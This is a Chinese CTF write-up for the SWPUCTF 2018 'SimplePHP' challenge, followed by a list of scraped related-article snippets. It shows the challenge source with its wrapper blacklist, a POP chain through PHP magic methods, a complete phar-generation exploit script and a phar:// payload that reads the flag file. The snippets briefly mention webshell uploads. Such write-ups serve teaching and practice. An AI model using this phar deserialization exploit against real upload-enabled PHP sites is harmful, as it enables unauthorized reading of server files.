D.MIND
D.MIND

[SWPUCTF 2018]SimplePHP【Phar:// + 文件上传】

文章目录

        • Phar:// 协议进行反序列化
        • 构造POP链
        • 生成phar
        • 总结:

一道不算难的反序列化+文件上传题目,但自己在构造POP链时还是愣了好久,本菜鸡名副其实了

首先是在查找文件处,URL明显是值得怀疑的file.php?file=
这按照惯例得试试能不能把一些文件读出来
一共是这些:index.php、base.php、file.php、upload_file.php、class.php

upload_file.php值得关注就是这个限制了,只允许图片
[SWPUCTF 2018]SimplePHP【Phar:// + 文件上传】_第1张图片

在file.php中就有对象的生成

//file.php
 
header("content-type:text/html;charset=utf-8");  
include 'function.php'; 
include 'class.php'; 
ini_set('open_basedir','/var/www/html/'); 
$file = $_GET["file"] ? $_GET['file'] : ""; 
if(empty($file)) {
      
    echo "
There is no file to show!
"; 
} 
$show = new Show(); 
if(file_exists($file)) {
      
    $show->source = $file; 
    $show->_show(); 
} else if (!empty($file)){
      
    die('file doesn\'t exists.'); 
} 
?>

class.php中比较重要的代码我 打上了!!!


class C1e4r
{
     
    public $test;
    public $str;
    public function __construct($name)
    {
     
        $this->str = $name;
    }
    public function __destruct()
    {
     
        $this->test = $this->str;
        echo $this->test;   //!!!
    }
}

class Show
{
     
    public $source;
    public $str;
    public function __construct($file)
    {
     
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()    //!!
    {
     
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
     
        $this->$key = $value;
    }
    public function _show()
    {
     
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
     
            die('hacker!');
        } else {
     
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
     
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
     
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class Test
{
     
    public $file;
    public $params;
    public function __construct()
    {
     
        $this->params = array();
    }
    public function __get($key) //!!!
    {
     
        return $this->get($key);
    }
    public function get($key)//!!!
    {
     
        if(isset($this->params[$key])) {
     
            $value = $this->params[$key];
        } else {
     
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)//!!!
    {
     
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}

Phar:// 协议进行反序列化

已经知道要反序列化了,但一直没找到unserialize()这个函数,那如何反序列化呢?本题是文件上传题,其实题做多就想的起来利用Phar://,其次Phar://本身就有反序列化这个漏洞,不依赖unserialize()这个函数

大概知道payload应该这样构造:

?file=phar://xxxxx.jpg

构造POP链

我们构造的phar://是作为$file来到Show这个类被赋值给$source,并在这里发生反序列化。再看到Test类中有一个file_get_contents()函数,基本确定是要通过POP链调用这个函数输出flag
[SWPUCTF 2018]SimplePHP【Phar:// + 文件上传】_第2张图片

先看class C1e4r
在析构函数__destruct()中会echo一个值,这里应该敏锐想到之前在Show这个类中看到的__toString()方法,会触发这个魔术方法,因此要从这儿跳转到show这个类
[SWPUCTF 2018]SimplePHP【Phar:// + 文件上传】_第3张图片

接着看class Show
直接看__toString(),会调用$str['str']source变量,可$str['str']是完全可控的,又因为Test类中有一个__get()魔术方法且没有source这个变量,可以触发__get()方法

1. 从一个难以访问的属性读取数据的时候 __get() 方法被调用
2. 向一个难以访问的属性赋值的时候__set()方法被调用
3. 难以访问包括:(1)私有属性,(2)没有初始化的属性

[SWPUCTF 2018]SimplePHP【Phar:// + 文件上传】_第4张图片
最后看class Test
这里$key传递的是source,且$this->params[$key]可控,那么直接令它等于f1ag.php即可
[SWPUCTF 2018]SimplePHP【Phar:// + 文件上传】_第5张图片
流程是:

class C1e4r::__destruct() => class Show::__toString() => class Test::__get()、get()、file_get()

生成phar


class C1e4r
{
     
    public $test;
    public $str;//!!new show
}

class Show
{
     
    public $source;
    public $str;        //!!new Test
}

class Test
{
     
    public $file;
    public $params;

}

$c=new C1e4r();
$s=new Show();
$t=new Test();

$c->str=$s;
$s->str['str']=$t;
$t->params['source']='/var/www/html/f1ag.php';

$phar = new Phar("test.phar"); //文件名,后缀名必须为phar
$phar->startBuffering();
$phar->setStub(""); //设置stub
$phar->setMetadata($c); //触发的开始是C1e4r(),所以传$c   将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
$phar->stopBuffering();    //签名自动计算

php运行一下即可得到一个phar文件,但这题限定了后缀,所以我们把生成的test.phat改成test.jpg再上传,然后访问upload目录获取到文件名,当然你也可以自己算出文件名,
[SWPUCTF 2018]SimplePHP【Phar:// + 文件上传】_第6张图片
在这里插入图片描述
payload:

?file=phar://./upload/febdf38ac03e62cb8f05d46cefefd732.jpg

解码一下即可
[SWPUCTF 2018]SimplePHP【Phar:// + 文件上传】_第7张图片

总结:

1.Phar://协议具有反序列化的漏洞,在文件上传中常用来读取上传的文件
2.POP链中一定要知道的一些魔术方法: ____destruct() __toString() __get(),尤其__destruct()是事故多发地!

你可能感兴趣的:(文件上传,反序列化)

  • 计算机常用端口号 王依硕 linux服务器ssh
    ftp:(20端口)用于ftp服务,用于数据传输。ftp:(21端口)用于文件上传和下载。ssh:(22端口)用于安全Shell访问和文件传输。telnet:(23端口)用于远程命令行计算机管理。smtp:(25端口)用于发送电子邮件。dns:(53端口)用于域名解析。dhcp:(67和68端口)用于动态分配IP地址和配置网络参数。tftp:(69端口)使用udp连接。finger:(79端口)是
  • 网页有效防止XSS,SQL注入,木马文件拦截上传等安全问题 程序员贵哥 网络安全xsssql安全网络安全web安全php
    网络安全问题一直是备受关注的话题,其中跨站脚本攻击(XSS)、SQL注入和木马文件上传是常见的安全威胁。下面我将详细介绍这些安全问题。首先是跨站脚本攻击(XSS)。XSS攻击是一种利用网站漏洞,将恶意脚本注入到用户浏览器中并执行的攻击方式。攻击者可以在网站中插入恶意脚本,当用户浏览该网站时,恶意脚本会被执行,从而窃取用户的敏感信息或执行其他恶意操作。XSS攻击可以分为反射型、存储型和DOM-bas
  • vue3 + Element + nodejs 大文件上传、断点续传 ZL随心 vue.js前端javascript
    前言大文件上传,一般时间都比较长,这么长的时间内,可能会出现各种各样的问题,比如断网,一旦出错,我们的文件就需要重新上传,这样造成资源浪费,如果我们使用了断点续传继续就不会造成资源浪费了,因为当出现错误的时候,我们再重新上传文件,就会从我们出现错误的地方开始上传了,对于出错前上传的内容就不用再上传了,对于已经上传过的文件,就可以实现秒传的效果了。完整仓库地址流程1、上传方法constonUploa
  • 不用form表单ajax上传图片(单个图片上传实例)及回显 焱墩 前端
    一、html代码段(这里无css样式)上传文件上传二、js(jquery)代码段$(function(){functionhideup(){$("#hidupload").click();},functionupchange(){$("#hidimg").prop("src",URL.createObjectURL($("#hidupload")[0].files[0]));}functionup
  • SpringBoot+vue实现跨域文件上传,并在linux上搭建tomcat文件服务器 刘在心中-Dennis springboottomcatjava
    一.前端前端我使用的是vue发送ajax请求实现文件上传,其它前端框架调用方式也是与此类似首页用户信息选取文件只支持上传.jpg文件取消确定exportdefault{name:"",data(){return{dialogFormVisible:false,//对话框表单是否显示formLabelWidth:'100px',//对话框宽度user:{},file:null,//上传的文件};},
  • Asp .Net Core 系列:Asp .Net Core 集成 Newtonsoft.Json Code技术分享 .netcorejson
    简介Newtonsoft.Json是一个在.NET环境下开源的JSON格式序列化和反序列化的类库。它可以将.NET对象转换为JSON格式的字符串,也可以将JSON格式的字符串转换为.NET对象。这个类库在.NET开发中被广泛使用,因为它功能强大、易于使用,并且有良好的性能。使用Newtonsoft.Json,你可以方便地进行以下操作:序列化:将.NET对象转换为JSON字符串。这通常用于将数据发送
  • Java实战:Spring Boot利用MinIO实现文件切片上传 拥抱AI javaspringboot开发语言
    本文将详细介绍如何在SpringBoot应用程序中使用MinIO实现文件切片极速上传技术。我们将深入探讨MinIO的概念、文件切片上传的原理,以及如何使用SpringBoot和MinIO实现文件切片上传和合并。1.引言在现代的互联网应用中,文件上传是一个常见的功能。然而,传统的文件上传功能可能无法满足大文件上传的需求。为了提高大文件上传的效率和速度,我们可以使用文件切片上传技术。文件切片上传技术可
  • 【Python】FTP库的介绍及用法 “趁早” pythonpython笔记
    目录1、应用场景2、FTP-标准库1、应用场景FTP库(ftplib)在Python中的应用场景主要包括:文件上传和下载:通过FTP服务器,可以提供用于上传和下载文件的功能。这在需要在服务器和客户端之间共享数据的情况下非常有用。网站维护:FTP库也可用于网站的维护,例如更新网页内容或上传新的网页。自动备份:可以编写脚本在特定时间自动连接到FTP服务器并完成数据备份。数据迁移:在需要从一个系统迁移到
  • 安卓Java面试题 71- 80 ️ 邪神 Android面试题安卓面试题androidjava
    71.简述Andorid中的Parcel存储机制?Android中的Parcel机制实现了Bundle传递对象使用Bundle传递对象,首先要将其序列化,但是,在Android中要使用这种传递对象的方式需要用到AndroidParcel机制,即,Android实现的轻量级的高效的对象序列化和反序列化机制。JAVA中的Serialize机制,译成串行化、序列化……,其作用是能将数据对象存入字节流当中
  • SpringMVC11、文件上传和下载 林知屿 框架篇springspringboot数据库后端javamvc
    11、文件上传和下载11.1、准备工作文件上传是项目开发中最常见的功能之一,springMVC可以很好的支持文件上传,但是SpringMVC上下文中默认没有装配MultipartResolver,因此默认情况下其不能处理文件上传工作。如果想使用Spring的文件上传功能,则需要在上下文中配置MultipartResolver。前端表单要求:为了能上传文件,必须将表单的method设置为POST,并
  • Spring MVC 简单文件上传 Bridge Fish Springspringmvcjava
    1.添加依赖commons-fileuploadcommons-fileupload1.3.12.配置文件上传解析器3.测试编写controller@Controller@RequestMapping("/account")publicclassAccountController{@RequestMapping(path="/upload")publicStringupload(HttpServl
  • element-ui 中 使用<el-upload></el-upload>组件,第二次点击上传无反应 今天星期八 vue.js前端javascriptelementui
    出现问题:在vue项目中使用el-upload组件,实现文件上传的功能,第一次点击可以上传,第二次点击按钮无反应出现此问题的原因:由于上次上传的文件流还在,未被清除解决办法:通过ref与组件进行关联导入在上传成功的函数中进行清空流文件handleAvatarSuccess(response,file,fileList){this.$refs.fileUploadBtn.clearFiles();/
  • centos安装FastDFS lingFei_y javacentosfastdfs
    1.Centos下安装FastDFS1.1上传将课前资料中的文件上传到linux下的/home/leyou/fdfs目录:[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-o32zAtGy-1576464628974)(assets/1526205834487.png)]1.2安装依赖FastDFS运行需要一些依赖,在课前资料提供的虚拟中已经安装好了这些依赖,如果大家想
  • 问题:JavaWeb中实现文件上传的方式有哪些? 张起灵的小可爱啊
    上回我们说了下文件下载的方式有哪些,这次我们从不同的环境下简单来说说文件上传的方式有哪些。文件上传的方式Servlet2.5方式Servlet3.0方式SpringMVC方式案例实操Servlet2.5方式文件上传涉及到前台页面的编写和后台服务器端代码的编写,前台发送文件,后台接收并保存文件,这才是一个完整的文件上传。1)前台页面在做文件上传的时候,会有一个上传文件的界面,首先我们需要一个表单,并
  • Node.js实现大文件断点续传 语无伦次¥! node.js
    前言平常业务需求:上传图片、Excel等,毕竟几M的大小可以很快就上传到服务器。针对于上传视频等大文件几百M或者几G的大小,就需要等待比较长的时间。这就产生了对应的解决方法,对于大文件上传时的暂停、断网、网络较差的情况下,使用切片+断点续传就能够很好的应对上述的情况,方案分析切片就是对上传视频进行切分,具体操作为:File.slice(start,end):返回新的blob对象拷贝blob的起始字
  • UI自动化-(web端窗口截图&文件上传-实操入门) 小白~小黑 UI自动化ui自动化pythonselenium测试工具
    1、窗口截图1.UI自动化中,为什么需要进行窗口截图?调试和故障排除:截图可以直观地查看界面的状态,快速识别和解决问题。当自动化过程中出现错误或异常时,通过查看截图可以确定是否是界面元素的问题,例如元素未找到、位置不正确等。记录测试结果:截图可以作为测试结果的一部分,用于记录特定时间点界面的样子。这对于测试报告和文档非常有用,可以提供可视化的证据,证明测试过程中界面的显示是否正确。验证界面布局和样
  • 单例模式之枚举 HeroNet2010 Java单例模式java
    众所周知,在java中有多种方式创建单例:饿汉式,懒汉式,双重检测懒汉式,静态内部类等,这些单列模式各有缺点:有的类加载时就初始化,浪费内存有的不保证多线程安全有的因为加了synchronized同步锁导致并发效率较低以上的单例模式都能通过反射,反序列化,克隆等方式被破坏publicclassSingletonTestDoubleCheckimplementsCloneable,Serializa
  • 【python】 用来将对象持久化的 pickle 模块 咖 啡加剁椒 软件测试pythonwindows开发语言软件测试功能测试自动化测试程序人生
    pickle模块可以对一个Python对象的二进制进行序列化和反序列化。说白了,就是它能够实现任意对象与二进制直接的相互转化,也可以实现对象与文本之间的相互转化。比如,我程序里有一个python对象,我想把它存到磁盘里,于是我用pickle把他转到一个文本里。当后面我想使用的时候,读取出来时候依然是一个python对象。一、pickle模块下的方法pickle模块提供了以下4种方法:dump():
  • SeaweedFS部署 仙女陈 linux
    SeaweedFS介绍SeaweedFS是一个分布式文件系统应用场景:主要用于存储处理小文件、大文件分块成小文件上传Githup地址:https://github.com/chrislusf/seaweedfs官方文档:https://github.com/chrislusf/seaweedfs/wikiseaweedfs源码解析:https://www.bbsmax.com/A/6pdDYXQK
  • 解锁Golang数据编解码能力:encoding库完全解析 walkskyer golang标准库golang服务器网络
    解锁Golang数据编解码能力:encoding库完全解析简介为何重视`encoding`库`encoding`库的实战开发重要性JSON处理基本使用序列化与反序列化处理复杂JSON结构自定义序列化行为错误处理和性能优化建议XML处理基本概念和使用方法序列化与反序列化使用标签控制XML节点的名称、属性和命名空间处理复杂和嵌套的XML结构性能优化和错误处理CSV文件处理`encoding/csv`库
  • JAVA面试题28 CrazyMax_zh java开发语言
    面试题:Java中的静态变量和实例变量有何区别?它们存储在内存的哪个部分?答案:静态变量属于类,实例变量属于对象。静态变量在内存中只有一份拷贝,存储在方法区(JVM内存中的一部分),而实例变量每个对象都有自己的值,存储在堆内存中。面试题:Java中什么是序列化(Serialization)?如何实现序列化和反序列化?答案:序列化是将对象转换为字节序列以便存储或传输的过程。实现序列化需要让类实现Se
  • SpringMVC的文件上传与下载 lvpflv SpringMVCjavaspring
    SpringMVC文件上传:使用:org.springframework.web.multipart.commons.CommonsMultipartResolver使用:headPhoto.transferTo(file);2、文件存储位置问题StringrealPath=request.getServletContext().getRealPath("/upload")Stringdir=ne
  • 使用Node.js开发一个文件上传功能 JJCTO Node.jsnode.js
    在现代Web应用程序开发中,文件上传是一个非常常见且重要的功能。今天我们将通过Node.js来开发一个简单而强大的文件上传功能。使用Node.js来处理文件上传可以带来许多好处,包括简单的代码实现、高效的性能和灵活的配置选项。首先,我们需要创建一个基本的Node.js项目。在命令行中输入以下命令:mkdirfile-upload-appcdfile-upload-appnpminit-y接下来,我
  • 关于TypeReference的使用 韩_师兄 技能点javajackson
    关于TypeReference的使用在项目中,有遇到TypeReference的使用,其主要在字符串转对象过程中,对于序列化和反序列化中也有效果,将字符串转换成自定义对象.1说明以常见为例,在com.alibaba.fastjson包下面的TypeReference类,是指Type的Reference,表示某类型的一个指向或者引用.protectedTypeReference(){//当前类父类的
  • 友点CMS image_upload.php 文件上传漏洞复现 OidBoy_G 漏洞复现phpweb安全安全
    0x01产品简介友点CMS是一款高效且灵活的网站管理系统,它为用户提供了简单易用的界面和丰富的功能。无论是企业还是个人,都能通过友点CMS快速搭建出专业且美观的网站。该系统支持多种内容类型和自定义模板,方便用户按需调整。同时,它具备强大的SEO功能,能提升网站在搜索引擎中的排名。友点CMS还支持多语言设置,适应国际化需求。总的来说,友点CMS是网站建设的理想选择,既高效又易用。0x02漏洞概述友点
  • Guava 工具类之Cache的使用 本地缓存组件 ʚ小华 guava缓存
    一.guavacache介绍1.介绍guavacache是Googleguava中提供的一款轻量级的本地缓存组件,其特点是简单、轻便、完善、扩展性强,内存管理机制也相对完善。2.使用缓存的优点1.减少了网络调用的开销2.减少了数据请求的序列化和反序列化二.guavacache分类guavacache提供了2种类型:Cache:创建1个缓存.LoadingCache:它能够通过CacheLoader
  • docker搭建现成的靶场 晓幂 docker容器运维
    Docker安装:apt-getinstalldocker.ioUpload-labs——文件上传靶场搭建:因为Dockerhub上存在镜像源,所以,索性直接拉取过来,dockerpullc0ny1/upload-labs等到下载完成之后,就可以创建容器:dockerrun-d-p81:80c0ny1/upload-labs-p:意为端口映射,格式为宿主机端口:容器端口。由于我的Linux的80端
  • CTFHub技能树web之文件上传(一) wz_fisher 安全web安全
    一.前置知识文件上传漏洞:文件上传功能是许多Web应用程序的常见功能之一,但在实施不当的情况下,可能会导致安全漏洞。文件上传漏洞的出现可能会使攻击者能够上传恶意文件,执行远程代码,绕过访问控制等。文件类型验证:Web应用程序通常会对上传的文件类型进行验证,以确保只允许特定类型的文件上传。这种验证可以通过检查文件扩展名或内容类型(MIME类型)来实现。然而,这种验证机制往往是不可靠的,因为攻击者可以
  • CTFHub技能树web之文件上传(二) wz_fisher 网络安全安全
    第四题:MIME绕过MIME类型校验就是我们在上传文件到服务端的时候,服务端会对客户端也就是我们上传的文件的Content-Type类型进行检测,如果是白名单所允许的,则可以正常上传,否则上传失败。首先对上传的一句话木马抓包将Content-Type这一栏改为image/jpeg上传成功,使用蚁剑连接,成功连接第五题:00截断%00是截断的意思,后面的内容舍弃上传一句话木马,抓包将filename
  • php session序列化,深入解析PHP中SESSION反序列化机制 罅天 phpsession序列化
    简介在php.ini中存在三项配置项:session.save_path=""--设置session的存储路径session.save_handler=""--设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)session.auto_startboolen--指定会话模块是否在请求开始时启动一个会话,默认为0不启动session.serialize_ha
  • jquery实现的jsonp掉java后台 知了ing javajsonpjquery
    什么是JSONP? 先说说JSONP是怎么产生的: 其实网上关于JSONP的讲解有很多,但却千篇一律,而且云里雾里,对于很多刚接触的人来讲理解起来有些困难,小可不才,试着用自己的方式来阐释一下这个问题,看看是否有帮助。 1、一个众所周知的问题,Ajax直接请求普通文件存在跨域无权限访问的问题,甭管你是静态页面、动态网页、web服务、WCF,只要是跨域请求,一律不准; 2、
  • Struts2学习笔记 caoyong struts2
    SSH : Spring + Struts2 + Hibernate 三层架构(表示层,业务逻辑层,数据访问层) MVC模式 (Model View Controller) 分层原则:单向依赖,接口耦合 1、Struts2  =  Struts  + Webwork 2、搭建struts2开发环境    a>、到www.apac
  • SpringMVC学习之后台往前台传值方法 满城风雨近重阳 springMVC
    springMVC控制器往前台传值的方法有以下几种: 1.ModelAndView    通过往ModelAndView中存放viewName:目标地址和attribute参数来实现传参:      ModelAndView mv=new ModelAndView();  mv.setViewName="success
  • WebService存在的必要性? 一炮送你回车库 webservice
    做Java的经常在选择Webservice框架上徘徊很久,Axis  Xfire Axis2 CXF ,他们只有一个功能,发布HTTP服务然后用XML做数据传输。 是的,他们就做了两个功能,发布一个http服务让客户端或者浏览器连接,接收xml参数并发送xml结果。 当在不同的平台间传输数据时,就需要一个都能解析的数据格式。 但是为什么要使用xml呢?不能使json或者其他通用数据
  • js年份下拉框 3213213333332132 java web ee
    <div id="divValue">test...</div>测试 //年份 <select id="year"></select> <script type="text/javascript"> window.onload =
  • 简单链式调用的实现技术 归来朝歌 方法调用链式反应编程思想
    在编程中,我们可以经常遇到这样一种场景:一个实例不断调用它自身的方法,像一条链条一样进行调用 这样的调用你可能在Ajax中,在页面中添加标签: $("<p>").append($("<span>").text(list[i].name)).appendTo("#result");   也可能在HQ
  • JAVA调用.net 发布的webservice 接口 darkranger webservice
    /** * @Title: callInvoke * @Description: TODO(调用接口公共方法) * @param @param url 地址 * @param @param method 方法 * @param @param pama 参数 * @param @return * @param @throws BusinessException
  • Javascript模糊查找 | 第一章 循环不能不重视。 aijuans Way
    最近受我的朋友委托用js+HTML做一个像手册一样的程序,里面要有可展开的大纲,模糊查找等功能。我这个人说实在的懒,本来是不愿意的,但想起了父亲以前教我要给朋友搞好关系,再加上这也可以巩固自己的js技术,于是就开始开发这个程序,没想到却出了点小问题,我做的查找只能绝对查找。具体的js代码如下: function search(){ var arr=new Array("my
  • 狼和羊,该怎么抉择 atongyeye 工作
    狼和羊,该怎么抉择 在做一个链家的小项目,只有我和另外一个同事两个人负责,各负责一部分接口,我的接口写完,并全部测联调试通过。所以工作就剩下一下细枝末节的,工作就轻松很多。每天会帮另一个同事测试一些功能点,协助他完成一些业务型不强的工作。 今天早上到公司没多久,领导就在QQ上给我发信息,让我多协助同事测试,让我积极主动些,有点责任心等等,我听了这话,心里面立马凉半截,首先一个领导轻易说
  • 读取android系统的联系人拨号 百合不是茶 androidsqlite数据库内容提供者系统服务的使用
           联系人的姓名和号码是保存在不同的表中,不要一下子把号码查询来,我开始就是把姓名和电话同时查询出来的,导致系统非常的慢   关键代码:     1, 使用javabean操作存储读取到的数据 package com.example.bean; /** * * @author Admini
  • ORACLE自定义异常 bijian1013 数据库自定义异常
    实例: CREATE OR REPLACE PROCEDURE test_Exception ( ParameterA IN varchar2, ParameterB IN varchar2, ErrorCode OUT varchar2 --返回值,错误编码 ) AS /*以下是一些变量的定义*/ V1 NUMBER; V2 nvarc
  • 查看端号使用情况 征客丶 windows
    一、查看端口 在windows命令行窗口下执行: >netstat -aon|findstr "8080" 显示结果: TCP     127.0.0.1:80         0.0.0.0:0    &
  • 【Spark二十】运行Spark Streaming的NetworkWordCount实例 bit1129 wordcount
    Spark Streaming简介   NetworkWordCount代码   /* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with
  • Struts2 与 SpringMVC的比较 BlueSkator struts2spring mvc
    1. 机制:spring mvc的入口是servlet,而struts2是filter,这样就导致了二者的机制不同。 2. 性能:spring会稍微比struts快。spring mvc是基于方法的设计,而sturts是基于类,每次发一次请求都会实例一个action,每个action都会被注入属性,而spring基于方法,粒度更细,但要小心把握像在servlet控制数据一样。spring
  • Hibernate在更新时,是可以不用session的update方法的(转帖) BreakingBad Hibernateupdate
    地址:http://blog.csdn.net/plpblue/article/details/9304459 public void synDevNameWithItil() {Session session = null;Transaction tr = null;try{session = HibernateUtil.getSession();tr = session.beginTran
  • 读《研磨设计模式》-代码笔记-观察者模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; import java.util.Observable; import java.util.Observer; /** * “观
  • 重置MySQL密码 chenhbc mysql重置密码忘记密码
    如果你也像我这么健忘,把MySQL的密码搞忘记了,经过下面几个步骤就可以重置了(以Windows为例,Linux/Unix类似): 1、关闭MySQL服务 2、打开CMD,进入MySQL安装目录的bin目录下,以跳过权限检查的方式启动MySQL mysqld --skip-grant-tables  3、新开一个CMD窗口,进入MySQL mysql -uroot  
  • 再谈系统论,控制论和信息论 comsci 设计模式生物能源企业应用领域模型
                               再谈系统论,控制论和信息论     偶然看
  • oracle moving window size与 AWR retention period关系 daizj oracle
    转自: http://tomszrp.itpub.net/post/11835/494147 晚上在做11gR1的一个awrrpt报告时,顺便想调整一下AWR snapshot的保留时间,结果遇到了ORA-13541这样的错误.下面是这个问题的发生和解决过程. SQL> select * from v$version; BANNER -------------------
  • Python版B树 dieslrae python
    话说以前的树都用java写的,最近发现python有点生疏了,于是用python写了个B树实现,B树在索引领域用得还是蛮多了,如果没记错mysql的默认索引好像就是B树... 首先是数据实体对象,很简单,只存放key,value class Entity(object): '''数据实体''' def __init__(self,key,value)
  • C语言冒泡排序 dcj3sjt126com 算法
    代码示例: # include <stdio.h> //冒泡排序 void sort(int * a, int len) { int i, j, t; for (i=0; i<len-1; i++) { for (j=0; j<len-1-i; j++) { if (a[j] > a[j+1]) // >表示升序
  • 自定义导航栏样式 dcj3sjt126com 自定义
    -(void)setupAppAppearance { [[UILabel appearance] setFont:[UIFont fontWithName:@"FZLTHK—GBK1-0" size:20]]; [UIButton appearance].titleLabel.font =[UIFont fontWithName:@"FZLTH
  • 11.性能优化-优化-JVM参数总结 frank1234 jvm参数性能优化
    1.堆 -Xms --初始堆大小 -Xmx --最大堆大小 -Xmn --新生代大小 -Xss --线程栈大小 -XX:PermSize  --永久代初始大小 -XX:MaxPermSize  --永久代最大值 -XX:SurvivorRatio --新生代和suvivor比例,默认为8 -XX:TargetSurvivorRatio --survivor可使用
  • nginx日志分割 for linux HarborChung nginxlinux脚本
    nginx日志分割 for linux 默认情况下,nginx是不分割访问日志的,久而久之,网站的日志文件将会越来越大,占用空间不说,如果有问题要查看网站的日志的话,庞大的文件也将很难打开,于是便有了下面的脚本   使用方法,先将以下脚本保存为 cutlog.sh,放在/root 目录下,然后给予此脚本执行的权限   复制代码代码如下: chmo
  • Spring4新特性——泛型限定式依赖注入 jinnianshilongnian springspring4泛型式依赖注入
    Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API  Spring4新
  • centOS安装GCC和G++ liuxihope centosgcc
    Centos支持yum安装,安装软件一般格式为yum install .......,注意安装时要先成为root用户。 按照这个思路,我想安装过程如下: 安装gcc:yum install gcc 安装g++: yum install g++ 实际操作过程发现,只能有gcc安装成功,而g++安装失败,提示g++ command not found。上网查了一下,正确安装应该
  • 第13章 Ajax进阶(上) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • How to determine BusinessObjects service pack and fix pack blueoxygen BO
    http://bukhantsov.org/2011/08/how-to-determine-businessobjects-service-pack-and-fix-pack/   The table below is helpful. Reference   BOE XI 3.x 12.0.0. y BOE XI 3.0 12.0. x. y BO
  • Oracle里的自增字段设置 tomcat_oracle oracle
     大家都知道吧,这很坑,尤其是用惯了mysql里的自增字段设置,结果oracle里面没有的。oh,no   我用的是12c版本的,它有一个新特性,可以这样设置自增序列,在创建表是,把id设置为自增序列 create table t ( id       number generated by default as identity (start with 1 increment b
  • Spring Security(01)——初体验 yang_winnie springSecurity
    Spring Security(01)——初体验     博客分类: spring Security Spring Security入门安全认证        首先我们为Spring Security专门建立一个Spring的配置文件,该文件就专门用来作为Spring Security的配置
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他